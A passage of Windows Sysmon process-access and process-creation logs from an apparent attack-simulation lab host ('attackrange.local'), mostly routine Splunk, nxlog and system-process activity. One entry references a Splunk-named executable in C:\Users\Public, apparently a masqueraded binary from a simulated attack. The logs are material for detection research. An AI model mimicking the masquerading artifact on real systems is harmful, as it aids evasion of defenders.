C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1073-5F25-0000-0010411D0400}\r\nTargetProcessId: 3976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1073-5F25-0000-0010411D0400}","TargetProcessId":"3976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.755\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.755","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.849\r\nSourceProcessGUID: {E2A3D6B1-1073-5F25-0000-0010411D0400}\r\nSourceProcessId: 3976\r\nSourceThreadId: 4004\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.849","SourceProcessGUID":"{E2A3D6B1-1073-5F25-0000-0010411D0400}","SourceProcessId":"3976","SourceThreadId":"4004","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.385\r\nProcessGuid: {E2A3D6B1-1074-5F25-0000-00101A1F0400}\r\nProcessId: 2564\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.385","ProcessGuid":"{E2A3D6B1-1074-5F25-0000-00101A1F0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1074-5F25-0000-00101A1F0400}\r\nTargetProcessId: 2564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1074-5F25-0000-00101A1F0400}","TargetProcessId":"2564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1074-5F25-0000-00101A1F0400}\r\nTargetProcessId: 2564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1074-5F25-0000-00101A1F0400}","TargetProcessId":"2564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\Sy